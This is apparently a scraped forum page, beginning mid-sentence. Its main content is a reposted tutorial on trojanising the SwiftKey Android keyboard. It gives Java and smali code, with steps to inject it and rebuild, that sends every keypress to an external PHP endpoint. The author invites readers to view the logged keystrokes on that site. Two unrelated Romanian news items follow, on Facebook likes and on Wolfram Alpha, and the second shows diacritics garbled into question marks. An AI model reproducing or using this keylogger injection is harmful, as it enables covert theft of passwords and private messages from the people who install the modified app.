we’re interested in. I’ve done the hard work already and found what we’re looking for in the ‘touchtype\keyboard\inputeventmodel\events’ directory. Go there and open up KeyInputEvent.smali in a text editor. We’re very lucky that SwiftKey isn’t ProGuard protected which obfuscates code and really slows down reverse engineering but never makes it impossible. [h=2]Reading the Smali[/h] So let’s examine some of the KeyInputEvent smali code: .class public abstract Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent; .super Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent; .source "KeyInputEvent.java" # direct methods .method public constructor (Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V .locals 0 .parameter "extractedText" .parameter "inputText" .prologue .line 8 invoke-direct {p0, p1, p2}, Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;->(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V .line 9 return-void .end method This class seems to be called whenever the user makes a single keypress in SwiftKey but not when using flow. The constructor is what we’re looking at and is called with 2 parameters, an instance of a ‘com/touchtype_fluency/service/TouchTypeExtractedText’ class and a CharSequence which is the key pressed. We want to send this key to our servers so we need to insert the code here. If you’re a smali expert you can code it directly and compile but we’re not so we’ll code some in Java first, decompile and copy the smali over. We also want to send it in an AsyncTask as the keyboard is way too slow without it. This is my Java code which we’ll call MainActivity.java, part of a package called ‘com.androidapps.tutorial’: @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); CharSequence cs = "Hi how are u"; HashMap<String, String> data = new HashMap<String, String>(); data.put("data", cs.toString()); AsyncHttpPost asyncHttpPost = new AsyncHttpPost(data); asyncHttpPost.execute("http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php"); } public class AsyncHttpPost extends AsyncTask<String, String, String> { private HashMap<String, String> mData = null;// post data /** * constructor */ public AsyncHttpPost(HashMap<String, String> data) { mData = data; } /** * background */ @Override protected String doInBackground(String... params) { byte[] result = null; String str = ""; HttpClient client = new DefaultHttpClient(); HttpPost post = new HttpPost(params[0]);// in this case, params[0] is URL try { // set up post data ArrayList nameValuePair = new ArrayList(); Iterator it = mData.keySet().iterator(); while (it.hasNext()) { String key = it.next(); nameValuePair.add(new BasicNameValuePair(key, mData.get(key))); } post.setEntity(new UrlEncodedFormEntity(nameValuePair, "UTF-8")); HttpResponse response = client.execute(post); StatusLine statusLine = response.getStatusLine(); if(statusLine.getStatusCode() == HttpURLConnection.HTTP_OK){ result = EntityUtils.toByteArray(response.getEntity()); str = new String(result, "UTF-8"); } } catch (UnsupportedEncodingException e) { e.printStackTrace(); } catch (Exception e) { } return str; } /** * on getting result */ @Override protected void onPostExecute(String result) { // something... } } When we export this from Eclipse as an APK, decompile and look at the directory we find 2 files, MainActivity.smali and MainActivity$AsyncHttpPost.smali. The ‘$’ in the filename means it’s the AsyncHttpPost inner class. Let’s look at the onCreate of MainActivity: MainActivity.smali .method protected onCreate(Landroid/os/Bundle;)V .locals 6 .parameter "savedInstanceState" .prologue .line 146 invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V .line 149 const-string v1, "Hi how are u" .line 150 .local v1, cs:Ljava/lang/CharSequence; new-instance v2, Ljava/util/HashMap; invoke-direct {v2}, Ljava/util/HashMap;->()V .line 151 .local v2, data:Ljava/util/HashMap;,"Ljava/util/HashMap<Ljava/lang/String;Ljava/lang/String;>;" const-string v3, "data" invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String; move-result-object v4 invoke-virtual {v2, v3, v4}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; .line 152 new-instance v0, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost; invoke-direct {v0, p0, v2}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;->(Lcom/androidapps/tutorial/MainActivity;Ljava/util/HashMap;)V .line 153 .local v0, asyncHttpPost:Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost; const/4 v3, 0x1 new-array v3, v3, [Ljava/lang/String; const/4 v4, 0x0 const-string v5, "http://www.android-app-development.ie/swiftkey_keylogger/keypresses.php" aput-object v5, v3, v4 invoke-virtual {v0, v3}, Lcom/androidapps/tutorial/MainActivity$AsyncHttpPost;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask; .line 158 return-void .end method So we better explain some of this code. The first line is the smali method definition of onCreate with the Bundle parameter passed in and the return type at the end, which is V for void. Java primitives are denoted by a single letter and can be missed sometimes so keep an eye out for them. V void Z boolean B byte S short C char I int J long (64 bits) F float D double (64 bits Next line is very important for us, it declares how many local registers are to be used in this method without including registers allocated to the parameters of the method. The number of parameters for any given method will always be the number of input parameters + 1. This is due to an implicit reference to the current object that resides in parameter register 0 or p0 (in java this is called the “this” reference). The registers are essentially references, and can point to both primitive data types and java objects. Given 6 local registers, 1 parameter register, and 1 “this” reference, the onCreate() method uses an effective 8 registers For convenience, smali uses a ‘v’ and ‘p’ naming convention for local vs. parameter registers. Essentially, parameter (p) registers can be represented by local (v) registers and will always reside in the highest available registers. For this example, onCreate() has 6 local registers and 2 parameter registers, so the naming scheme will look something like this: v0 - local 0 v1 - local 1 v2 - local 2 v3 - local 3 v4 - local 4 v5 - local 5 v6/p0 - local 6 or parameter 0 (this) v7/p1 - local 7 or parameter 1 (android/os/Bundle) [h=2]Opcodes[/h] Dalvik opcodes are relatively straightforward, but there are a lot of them. For the sake of this post’s length, we’ll only go over a few of the most commonly used opcodes. invoke-super vx, vy, … invokes the parent classes method in object vx, passing in parameter(s) vy, … new-instance vx creates a new object instance and places its reference in vx invoke-direct vx, vy, … invokes a method in object vx with parameters vy, … without the virtual method resolution const-string vx creates string constant and passes reference into vx invoke-virtual vx, vy, … invokes the virtual method in object vx, passing in parameters vy, … return-void returns void [h=2]Hacking the App[/h] Now that I’ve explained a bit of what the code means, let’s inject it into the KeyInput file of SwiftKey. Note in our exported Smali from MainActivity that it references the ‘com/androidapps/tutorial’ package so we need to change that to the package where KeyInput is which is ‘com/touchtype/keyboard/inputeventmodel/events/’. So open up both MainActivity.smali and MainActivity$AsyncHttpPost and do a search and replace changing ‘com/androidapps/tutorial/MainActivity’ to ‘com/touchtype/keyboard/inputeventmodel/events/KeyInputEvent’. Next we’ve to ensure we have the right amount of registers in the SwiftKey KeyInputEvent to support our new method calls. We can see that the original constructor uses no local variables and our MainActivity uses 6 so just set locals 0 to locals 6. Then copy our new code in, just before the return void of the constructor. In our injected code, the v1 local variable holds the CharSequence ‘Hi how are u’ which is converted to a String in the ‘invoke-interface {v1}, Ljava/lang/CharSequence;->toString’ line. We need to make the code use the CharSequence key the user pressed which is the second parameter so change v1 to p2. Next copy over our AsyncTask inner class into the same folder as KeyInputEvent.smali and rename it to KeyInputEvent$AsyncHttpPost. Make similiar changes to the TextInputEvent.smali file in the same directory if you want to track SwiftKey flows as well. [h=2]Rebuilding, Signing and Installing the Apk[/h] Before it was a bit of work to do these three steps but with APK multitool all you need to do is enter 15 in your project with your phone connected and the app should install. If you encountered any errors, post a comment below and I’ll help you out. I might have left a few things out of this tutorial for brevity’s sake. If it all worked and you didn’t change the POST URL, just start using the keyboard and check my page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php to see what keys are being sent from different IPs! Scary huh? Moral of the story if you want to avoid keyloggers or other malware from your Android? Stick to the Play store and don’t pirate apps! Sursa: Inserting keylogger code in Android SwiftKey using apktool | Android App Development Ireland

[h=1]Cum afla advertiserii totul despre un user doar din Like-urile date pe Facebook[/h]de Redactia Hit | 12 martie 2013 Nenumarate studii au aratat ca Facebook-ul este, dincolo de fenomenul de comunicare si socializare, o adevarata mina de aur pentru advertiseri care pot targeta publicul in functie de activitatile acestora pe reteaua de socializare. Mai mult, cercetatorii au demonstrat ca simplele Like-uri pe care le dati pe reteaua de socializare pot releva atat de multe date incat pot duce la realizarea unui adevarat portret al personalitatii userului. Cercetatorii de la Universitatea din Cambridge impreuna cu Microsoft Research au demonstrat ca folosind aplicatia MyPersonality, cei interesati de comportamentul userilor in reteaua de socializare pot construi un adevarat portret robot al utilizatorilor. Destul de inspaimantator este faptul ca acest lucru se poate face doar urmarind Like-urile pe care cineva le da pe Facebook si nimic mai mult. Cercetatorii spun ca Like-urile de pe Facebook sunt cea mai bogata sursa de informati despre utilizatori. Doar urmarind Like-urile cercetatorii au putut stabili sexul, apartenenta etnica, dar si convingerile politice si religioase ale utilizatorilor. Acuratetea datelor rezultate dupa urmarirea Like-urilor userilor este de 80%. Surse: The Verge, The Wall Street Journal Via: Cum afla advertiserii totul despre un user doar din Like-urile date pe Facebook | Hit.ro

[h=1]Wolfram Alpha, creierul din spatele Siri, va deveni ?i mai inteligent[/h] Dorian Prodan - 12 mar 2013 Stephen Wolfram, cercet?torul britanic din spatele proiectelor Mathematica ?i Wolfram Alpha, a anun?at în cadrul conferin?ei SXSW c? algoritmii de calcul impresionan?i din spatele acestor servicii vor cunoa?te îmbun?t??iri radicale în viitorul apropiat, acestea urmând s? beneficieze de o predic?ie care va simplifica utilizarea lor. Pentru cei mai pu?in familiariza?i cu Wolfram Alpha, aceasta este o platform? de calcul care, pe baza zecilor de mii de miliarde de tipuri de date agregate din surse diferite ?i a zecilor de mii de algoritmi matematici diferi?i care au fost dezvolta?i de-a lungul a trei decenii, ofer? nu banale rezultate, precum un motor de c?utare obi?nuit, ci r?spunsuri complexe. Cel mai faimos produs care folose?te algoritmii Wolfram Alpha este asistentul vocal Siri de la Apple, îns? compania ofer? o gam? larg? de aplica?ii pentru platformele mobile care permit utilizarea, generic? sau specializat?, a serviciilor sale. Toate aceste produse au îns? o mare problem?: sunt cam dificil de utilizat deoarece utilizatorii nu ?tiu întotdeauna cu exactitate ce vor s? afle. Pentru a trece de acest handicap ergonomic, Stephen Wolfram a anun?at c? Wolfram Alpha va primi o serie de rutine software pentru analiza datelor specificate sau introduse de utilizatori, acestea permi?ându-i s? prevad? întreb?rile pe care ace?tia le vor formula ?i s? ofere r?spunsuri f?r? a necesita utilizarea unei sintaxe greoaie. Un exemplu dat de Stephen Wolfram este cel al aplica?iilor de realitate augmentat?, care vor putea analiza mediul înconjur?tor, recunoa?te punctele de interes din jur ?i vor putea oferi date suplimentare despre acestea. Alte utiliz?ri vor fi mai pu?in spectaculoase, cum ar fi analiza automat? a datelor dintr-o foaie de calcul tabelar aleas? de utilizator, îns? toate fac parte din aceea?i campanie de implicare a modului de utilizare a serviciului. Toate aceste op?iuni vor fi lansate în viitorul apropiat în cadrul aplica?iilor pentru terminale mobile sub forma unui abonament. Odat? cu aceast? actualizare, ?i platforma Mathematica va fi disponibil? prin intermediul unor aplica?ii pe terminale mobile. Sursa: Wolfram Alpha, creierul din spatele Siri, va deveni ?i mai inteligent